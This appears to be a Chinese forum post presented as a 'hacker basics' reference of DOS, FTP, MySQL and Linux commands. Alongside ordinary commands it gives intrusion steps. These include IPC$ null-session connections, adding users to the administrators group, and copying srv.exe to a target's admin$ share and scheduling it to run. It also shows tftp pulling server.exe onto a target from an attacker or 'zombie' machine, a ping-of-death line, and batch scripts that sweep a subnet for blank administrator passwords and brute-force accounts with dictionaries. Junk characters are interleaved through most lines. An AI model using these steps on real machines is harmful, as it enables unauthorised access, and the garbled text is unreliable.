黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 4 e) O: w7 X7 @
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 ' t, l# W+ t4 A' |# C8 W* V' [
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
* }$ J$ ~1 t: M4 n* F( Wnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
6 K- [+ E0 C: k& A$ D) {9 Wnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
" [6 G' l9 K- T. _! ^$ lnet use h: /del 删除映射对方到本地的为H:的映射 1 u. F8 H0 U7 S% a  Y
net user 用户名　密码　/add 建立用户 + P( [& w9 p: ~1 q3 }% f% j
net user guest /active:yes 激活guest用户 6 {* V0 j. l9 l/ N0 ]& h
net user 查看有哪些用户 ( e3 Y& r. W/ f! P# w2 S% Q4 |
net user 帐户名 查看帐户的属性 0 z) k; b% Q! \+ ^) W
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
/ L6 ]1 W' g5 d+ `1 ?& f! Wnet start 查看开启了哪些服务 $ t" K$ E# d/ g  {$ s9 }2 j  G% N
net start 服务名　 开启服务；(如:net start telnet， net start schedule) " N- {; D9 y/ i5 _
net stop 服务名 停止某服务
5 ^+ ]. c) q) x- u* z0 nnet time \\目标ip 查看对方时间
9 }6 A, L; ]2 m" P- c& d& onet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ! `* l; J$ p" G3 d7 S
net view 查看本地局域网内开启了哪些共享 ! x( t" B' @4 m/ c2 q  V: q
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
5 K0 j0 E* k6 F* G  ?+ q7 ~6 y- Fnet config 显示系统网络设置
8 U0 W. @, }; \net logoff 断开连接的共享 7 V0 u; h5 `) Q; f& ]* }
net pause 服务名 暂停某服务
/ f% W* w- V. i& I0 t& @net send ip "文本信息" 向对方发信息 % f5 |. {; T1 J' A$ G3 O
net ver 局域网内正在使用的网络连接类型和信息
+ e: ^5 w1 i0 ~1 s( G* u' Z7 enet share 查看本地开启的共享
+ j  O! w% I1 n/ h& ynet share ipc$ 开启ipc$共享
1 s7 c) c' X, M4 B: T" Mnet share ipc$ /del 删除ipc$共享 8 @. e$ z: D/ ]/ _6 d- `% g' h
net share c$ /del 删除C：共享 0 J! k6 F) |& {2 G5 f2 }2 |
net user guest 12345 用guest用户登陆后用将密码改为12345
1 f" }+ t% Y; }& i% r+ znet password 密码 更改系统登陆密码 3 a' U: O1 ^/ g, T! L
netstat -a 查看开启了哪些端口,常用netstat -an + ^: T& c9 {# I2 P; f) c& T$ Q
netstat -n 查看端口的网络连接情况，常用netstat -an . d0 b# M& G% o9 o( k$ k
netstat -v 查看正在进行的工作
: r* `! |1 q7 A% `+ Unetstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
& p) i+ Y& v2 C8 L* Y/ nnetstat -s 查看正在使用的所有协议使用情况 0 x( }. t% m+ o; d8 O+ ~! T
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 $ [) m7 f# _% ^
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
- o; o2 `3 U4 c# ?ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
4 |& D3 V# h! B3 R4 V+ S# tping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 3 ?0 P- \" t  A/ X/ r
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
$ E. P. H" h6 |' _tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
" t0 @8 G9 `+ D! f- Fkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)   w2 m* ^3 l2 h0 Q& K# T
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 5 ~0 @# l4 f; U+ _& ^% u- z
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
& X5 F3 H: w* b& ~+ Vmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 * ?5 r- k" I1 K1 x0 D! v
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 * e1 e* m. q4 @2 ]
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
) t4 D1 p; B' r8 P2 kat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 : e2 C; S% D5 J% f
at id号 /delete 停止某个已注册的计划任务 " h: ^# ^! f/ B6 H
at 查看所有的计划任务
; T- c& d* f; {$ h8 }at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
! [4 S+ f* ^1 ~$ ~7 _% \, Ufinger username @host 查看最近有哪些用户登陆
$ G# q0 O- S  \( a* f2 |telnet ip 端口 远和登陆服务器,默认端口为23 8 i6 T! r1 ^% R4 T6 r
open ip 连接到IP（属telnet登陆后的命令） 5 i5 O! T& n' N7 u  U1 N
telnet 在本机上直接键入telnet 将进入本机的telnet ) y+ K% m/ [; I7 C, L# h0 `
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 # l( i( d1 l. Y6 V/ n
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 : y  `. [2 S1 o, ~
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 ( A3 t( k/ J! A. c
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 8 ]8 i/ i# T9 U4 n* i1 [
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 ' ~' }( k' N9 v) B
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
8 M/ ~6 W  J6 ~tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
' a! f+ A7 n6 J3 K/ iftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) 3 l+ O& `% Z/ x- T* q
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface / |# C" v% m! A0 v4 A3 w
arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 / O1 Y4 V2 e" i3 z0 j2 \0 B# ~- w
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 * @: E  c0 C' y
mem 查看cpu使用情况
# g( @4 E3 t+ X5 }- Y8 rattrib 文件名(目录名) 查看某文件（目录）的属性 # f' H, f, Y; l; V6 B1 ~+ d, G
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 7 k3 H* c3 H( U
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间   M7 w8 D* `) o$ R4 ^4 ^
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 7 U- H" b: X1 W+ R. s% u
set 指定环境变量名称=要指派给变量的字符 设置环境变量
: j8 T8 p+ J$ A! H4 y2 G+ Tset 显示当前所有的环境变量 - v5 }9 U, H' ^# e8 @- D1 _
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
2 ~6 n9 ]- d. Mpause 暂停批处理程序，并显示出：请按任意键继续.... 0 e2 I2 l$ i! B3 s
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
5 l+ R% l/ Y1 W5 Ugoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
+ B4 m& T9 f0 Q' r, Ycall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
0 R6 e8 X. v% O4 [1 V- Sfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） - g# a8 S+ s1 N  N' h# M  R4 G6 R
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
; O. {- ~1 r/ xecho 信息 在屏幕上显示出信息 3 A! U( j2 q  J
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
/ f+ ~0 N. O1 _+ f9 ifindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
6 G( u6 P: F6 l1 o" w7 s, U. C! efind 文件名 查找某文件 6 L3 w* f# C2 Y
title 标题名字 更改CMD窗口标题名字
0 \4 {; x2 g2 o% \3 o; R8 e0 Ecolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
+ k6 j/ a. O- X+ k1 X; _prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
7 |9 f" m- N% _5 Z) D  {; g6 }print 文件名 打印文本文件
$ c4 S' U1 O. i6 nver 在DOS窗口下显示版本信息 ( s  Z" E4 H" c: n2 O( _
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
! R- k  k! m  ~! d3 ]format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
7 h) M$ |* ^8 i  v' n# Smd　目录名 创建目录
7 t4 H+ s  z+ u: e4 P7 {7 N) xreplace 源文件　要替换文件的目录 替换文件   n' w+ L: A7 m
ren 原文件名　新文件名 重命名文件名 " }# `: o) z- k! m8 c
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
2 {: a) f) V9 d$ o$ i4 Y: Ktype 文件名 显示文本文件的内容 & u9 M. x& ?% z
more 文件名 逐屏显示输出文件 ! g. ^% X5 N9 s8 L
doskey 要锁定的命令＝字符
/ D. o* o  P, ndoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
. l% X' I, I+ b# Xtaskmgr 调出任务管理器
, k8 M1 K  a* V$ }% ichkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
) v- A) T  r2 N- V4 j( jtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
4 @5 R: e, j# c2 A$ ?6 N9 H" \exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
' b. r0 \* {  e: V% m  ~path 路径\可执行文件的文件名 为可执行文件设置一个路径。
" o' L8 `% d- g2 T% Dcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? * |* i- z9 x* [. M9 j
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
# o/ n+ e# H& aregedit /e 注册表文件名 导出注册表
% s3 ^# t' m( Icacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
2 ]% E. @: Q) ^" v. V" k- ucacls 文件名 查看文件的访问用户权限列表 7 S2 D9 J) C9 W" H) W* b  A: R0 L
REM 文本内容 在批处理文件中添加注解 # s) G: L& G& z
netsh 查看或更改本地网络配置情况! ~% e! R$ U, @2 d
IIS服务命令：! a  ~: Y6 B  L! x4 z; T  e
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） * g4 Y5 Q2 }) N6 U, v: O
iisreset /start或stop 启动（停止）所有Internet服务 4 F  J" |# M& s
iisreset /restart 停止然后重新启动所有Internet服务
& A/ v, ^3 Y9 Diisreset /status 显示所有Internet服务状态
& @- J% A5 _0 w& ]' diisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
3 M' I5 b2 u& ]4 e1 `& Viisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
! ~$ L4 O* N. q& a  O3 U& ~  h- }iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 ! S  n7 a( ?+ ]* o
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
1 f1 T  S) X$ m, p( m8 t" yFTP 命令： (后面有详细说明内容) 4 z/ c. o2 ~/ ~3 N4 r, Z0 Q
ftp的命令行格式为:
$ t% H; T" H% h* i2 r$ e# Qftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。. }% }, U, T7 @: ~
－d 使用调试方式。
/ ~) A( ~+ E1 m－n 限制ftp的自动登录,即不使用.netrc文件。
5 f$ r7 m& R6 C  t; }* a+ P- t* r－g 取消全局文件名。
4 l+ n4 D; h0 s( N7 W5 xhelp [命令] 或 ？[命令] 查看命令说明
& [" N. O7 f- m% o9 L/ h/ j! fbye 或 quit 终止主机FTP进程,并退出FTP管理方式.
2 L3 M9 J/ ~; o/ c1 _pwd 列出当前远端主机目录 5 z4 L4 h: P3 U! j& j+ j' p" p
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
( K. p4 i; e& Pget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 ) {: d. @0 q* R% e/ K
mget [remote-files] 从远端主机接收一批文件至本地主机 0 i  E% A% j5 \+ M2 x) C: t
mput local-files 将本地主机中一批文件传送至远端主机
+ v% U" U6 D' Vdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 $ @' }7 w) _" x- v
ascii 设定以ASCII方式传送文件(缺省值) 5 o' @$ I. x; u
bin 或 image 设定以二进制方式传送文件 * N9 r" m' D7 a5 s
bell 每完成一次文件传送,报警提示
5 m5 h$ C2 W# |9 {* R: T) b) Scdup 返回上一级目录
, p" T' r1 D2 d1 q: mclose 中断与远程服务器的ftp会话(与open对应)
( }1 v! ^4 B4 ~5 m, S: ~open host[port] 建立指定ftp服务器连接,可指定连接端口
$ y' |8 {1 z' @delete 删除远端主机中的文件
# g& t  I/ ~1 O2 nmdelete [remote-files] 删除一批文件
" |* j# \' b. w  i3 D6 I# wmkdir directory-name 在远端主机中建立目录 9 i, D+ y8 Z( ^. a9 B7 A  t- u
rename [from] [to] 改变远端主机中的文件名
1 B. _6 {" {- Y4 rrmdir directory-name 删除远端主机中的目录
: _& {+ I" L2 W/ q) i) ?status 显示当前FTP的状态 0 ?5 h' }3 K; E' g
system 显示远端主机系统类型
" d! E! ~, x6 Y5 _$ a7 L1 ^user user-name [password] [account] 重新以别的用户名登录远端主机
! K6 ?; P  [+ a, }4 u1 Aopen host [port] 重新建立一个新的连接 3 b8 D! e/ y; t# o# n* `8 ]
prompt 交互提示模式
/ F0 ~0 K- }0 u' I4 `" ~macdef 定义宏命令 / A: Q) m$ @9 f  Y
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 5 R2 j) _/ P/ w- O0 N+ S' f8 X
chmod 改变远端主机的文件权限 , v# R, s/ V9 J' [; ?
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 , V5 I# Z* ^  ?
cd remote－dir 进入远程主机目录
7 m9 \! F, B- C  s5 `; [$ Ocdup 进入远程主机目录的父目录   a, p4 S: E$ i7 J. P
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
! s" X3 o, O: I' y: h9 m) X+ oMYSQL 命令： 4 n5 K3 Y. K  q) ^  q; U5 V
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
7 D5 D5 o; i, U% G, D（例：mysql -h110.110.110.110 -Uroot -P123456 ! ^% V. R/ m  H2 v, X" l
注:u与root可以不用加空格，其它也一样）
7 B/ i- F+ J  T- k# X$ ?exit 退出MYSQL 4 E5 s: v( V( o8 c( l( M
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
. B% b% Q/ \/ @* \* n# x- {* f3 ~grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
! x- q+ q& J4 f, Q3 _show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
9 I( d. N" R2 v- T9 ?/ Duse mysql；$ B5 q  R6 a! t1 o- ?
show tables; 显示库中的数据表 ! M  X8 `+ ?- K, u5 G5 @" G& H$ a
describe 表名; 显示数据表的结构
5 W* [; Y- X8 Ocreate database 库名; 建库 3 l, L/ }7 B; r% q8 g0 s3 S" T7 L
use 库名；
- s: r: C0 V2 [0 Mcreate table 表名 (字段设定列表)； 建表
: R; w6 z6 V# z* l. Z4 cdrop database 库名;
+ p/ b- H4 B; X: M) v. Q2 U& Zdrop table 表名； 删库和删表
% h. h+ z. C+ ]/ Mdelete from 表名; 将表中记录清空
* h, C, Y; {4 N5 Eselect * from 表名; 显示表中的记录
' k/ A9 V8 J0 ?' Q5 O: i" Y8 R- G& mmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
9 [2 T. C% A) V" x1 G, Jwin2003系统下新增命令（实用部份）：
) k7 ]8 b- [) X: r# X& e0 ushutdown /参数 关闭或重启本地或远程主机。
" T' `/ o: }4 ^参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。  ^0 C6 w+ t$ c' b2 y5 o8 z8 c; p3 _
例：shutdown /r /t 0 立即重启本地主机（无延时） 4 c  t! C9 y; @2 \
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。+ E- m* o9 o" c+ ]" s
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
( l1 \4 ~' ^  E% ]5 htasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
- l! k% C! [7 P( A' \- j参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程' P% e. p, V7 g$ `5 Y4 a, |# c
Linux系统下基本命令： 要区分大小写
2 g) R4 [2 Q. x: H9 g$ ouname 显示版本信息（同win2K的 ver）
- j! e, K% U1 ~9 C6 [  v! I6 {- zdir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） 3 s- k7 N/ F( I/ P
pwd 查询当前所在的目录位置
9 K9 J0 ]) s+ y* Lcd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
) i1 ~4 A! q6 ]. n# q5 ?cat 文件名 查看文件内容 % s+ Y& M3 j: X3 j" d: E: R
cat >abc.txt 往abc.txt文件中写上内容。 3 H7 g" J' b8 P7 x, z. d# \
more 文件名 以一页一页的方式显示一个文本文件。 4 D( `  r2 Q. @4 p! t% Z' I. O
cp 复制文件
' Z" m& T& \( u4 Hmv 移动文件
! S$ ^5 C# E9 a- y3 L8 W/ ~rm 文件名 删除文件，rm -a 目录名删除目录及子目录
' y+ ^# I. W: }% n) xmkdir 目录名 建立目录 4 i1 K# Y! s8 Y( x' K
rmdir 删除子目录，目录内没有文档。 2 ]% I/ }5 c% h  Y& K- d2 ^
chmod 设定档案或目录的存取权限
* }8 z# |* ?/ O/ n. d' Rgrep 在档案中查找字符串
! Q1 D, a0 |4 N# h5 N. I2 idiff 档案文件比较 9 z- Q% e( h5 P; B1 s1 ?( s
find 档案搜寻 ' ~  {, ?7 B( \7 z6 O% p
date 现在的日期、时间
9 p# l# |& E& `& \; `5 g8 _who 查询目前和你使用同一台机器的人以及Login时间地点
8 O/ X# v8 M) c4 K& Y6 vw 查询目前上机者的详细资料 * ]5 T' ]$ }9 B- ?
whoami 查看自己的帐号名称 ) L8 h1 n* P1 u, R0 P0 Q4 c/ W
groups 查看某人的Group
) H; z5 e% T7 Z% kpasswd 更改密码 / x8 Q# F9 C4 l+ F; B% _/ O1 b/ U
history 查看自己下过的命令 + Q& o6 A, z6 F. q$ f; m
ps 显示进程状态 9 m2 U/ V/ c# F( T/ A, M4 d4 A
kill 停止某进程 6 [5 }4 D, y* {
gcc 黑客通常用它来编译C语言写的文件 1 P( \/ I/ e$ C( Z2 E2 L* J" b7 A
su 权限转换为指定使用者 " k3 S2 g8 ^' a: z
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 ! \0 ~- ]! a1 O
ftp ftp连接上某服务器（同win2K
4 t2 a, ?2 I! m" w& k& o/ }5 V0 r附：批处理命令与变量5 a% O0 q+ _" E: @+ `% c  w* W" N4 f
1：for命令及变量 基本格式：
  `% g7 y) o/ k& ?7 l9 |7 TFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。# L* I1 \1 t2 R, L2 f
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3' X" `) g. d. U/ g) q4 f% [
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}
6 R4 Y: `' J; N" {7 U$ n7 `0 g. v" r* wcommand：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开* Y4 p0 _8 I& p; l$ J/ k9 g" h
command_parameters：为特定命令指定参数或命令行开关- b" t$ s1 [8 A' f2 k/ l- h3 ^
IN (set)：指在(set)中取值；DO command ：指执行command
, Z$ c2 [! y0 c: g: T1 s: Z. j2 Z参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 / U% I! ^& T6 U
用法举例： / p8 b! O1 \7 i2 ^
@echo off ( H4 ^4 u' @7 M8 [
echo 用法格式：test.bat *.*.* > test.txt   N+ {- S2 ]9 D6 V
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
2 h& u- p8 p0 u' h7 r存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
" p8 e2 |0 A8 m/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
1 N) T- l8 D' m% [@echo off
" v9 z3 a9 y2 a( o8 Necho 用法格式：ok.bat ip
& f+ H+ n0 k/ w# U: ]FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 6 [' L. h$ E9 W5 I
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
4 F0 _: e0 y/ x# ^# \2：if命令及变量 基本格式： * V1 K3 c+ Y* f* p' _
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。8 y2 A, M3 V- q2 u$ \6 U7 H
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。0 o4 a% |  S; S3 S0 V4 Y0 F
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
. j) T1 Y( s; c3 J7 fIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
- p/ C/ ]. b; l$ G  Z- q$ j例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
' |6 k/ X* S& ~% f; n# |9 DIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
  H; b$ A) f, g+ D. d2 [9 N例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
# r+ ~% c4 B; d* E( ?! KIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”